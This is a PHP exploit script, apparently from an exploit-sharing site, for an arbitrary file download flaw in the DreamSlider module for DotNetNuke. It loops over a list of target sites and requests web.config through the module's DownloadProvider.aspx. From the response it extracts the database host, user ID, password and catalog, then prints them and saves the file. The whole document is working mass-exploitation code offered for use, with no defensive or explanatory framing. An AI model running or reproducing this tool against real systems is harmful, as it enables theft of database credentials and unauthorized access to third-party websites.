dotNetNuke DreamSlider Arbitrary File Download

1. <?php
2. Class IDX_dotNetNuke {
3.     public $url;
4.  
5.     public function validUrl() {
6.         if(!preg_match("/^http:\/\//", $this->url) AND !preg_match("/^https:\/\//", $this->url)) {
7.             $url = "http://".$this->url;
8.             return $url;
9.         } else {
10.             return $this->url;
11.         }
12.     }
13.  
14.     public function curl($url, $data = null, $headers = null, $cookie = true) {
15.         $ch = curl_init();
16.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
17.               curl_setopt($ch, CURLOPT_URL, $url);
18.               curl_setopt($ch, CURLOPT_USERAGENT, md5(uniqid()));
19.               //curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
20.               curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
21.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
22.               curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
23.               curl_setopt($ch, CURLOPT_TIMEOUT, 5);
24.  
25.         if($data !== null) {
26.               curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
27.               curl_setopt($ch, CURLOPT_POST, TRUE);
28.               curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
29.         }
30.  
31.         if($headers !== null) {
32.               curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
33.         }
34.  
35.         if($cookie === true) {
36.               curl_setopt($ch, CURLOPT_COOKIE, TRUE);
37.               curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
38.               curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
39.         }
40.  
41.         $exec = curl_exec($ch);
42.         $info = curl_getinfo($ch);
43.  
44.               curl_close($ch);
45.  
46.         return (object) [
47.             "response"  => $exec,
48.             "info"      => $info
49.         ];
50.  
51.     }
52.  
53.     public function getValue($param, $kata1, $kata2) {
54.         if(strpos($param, $kata1) === FALSE) return FALSE;
55.         if(strpos($param, $kata2) === FALSE) return FALSE;
56.         $start = strpos($param, $kata1) + strlen($kata1);
57.         $end = strpos($param, $kata2, $start);
58.         $return = substr($param, $start, $end - $start);
59.         return $return;
60.     }
61.  
62.     public function exploit() {
63.         $url = $this->url;
64.         $url = $this->validUrl();
65.  
66.         $file = "~/web.config";
67.         $get  = $this->curl($url."/DesktopModules/DreamSlider/DownloadProvider.aspx?File=".$file);
68.  
69.         while($get->response === false) {}
70.  
71.         preg_match("/Data Source=(.*?)/i", $get->response, $host);
72.         preg_match("/User ID=(.*?);/i", $get->response, $user);
73.         $pass = $this->getValue($get->response, ";Password=" , "\"");
74.         preg_match("/Initial Catalog=(.*?);/i", $get->response, $db);
75.  
76.         print "[>] Host: ".$host[1]." | User: ".$user[1]." | Pass: ".$pass." | Db: ".$db[1]." \n";
77.         print "[>] ".parse_url($this->url, PHP_URL_HOST)."_web.config saved!\n\n";
78.         $this->save($get->response);
79.        
80.     }
81.  
82.     public function save($data) {
83.         $handle = fopen(parse_url($this->url, PHP_URL_HOST)."_web.config", "w");
84.         fwrite($handle, $data);
85.         fclose($handle);
86.     }
87. }
88.  
89. $dotNetNuke = new IDX_dotNetNuke();
90.  
91. if(!isset($argv[1])) die("!! Usage: php ".$argv[0]." target.txt");
92. if(!file_exists($argv[1])) die("!! File target ".$argv[1]." tidak di temukan!!");
93. $open = explode("\n", file_get_contents($argv[1]));
94.  
95. foreach($open as $list) {
96.     $dotNetNuke->url = trim($list);
97.     $dotNetNuke->url = $dotNetNuke->validUrl();
98.  
99.     print "[*] Exploiting ".parse_url($dotNetNuke->url, PHP_URL_HOST)."\n";
100.     $dotNetNuke->exploit();
101. }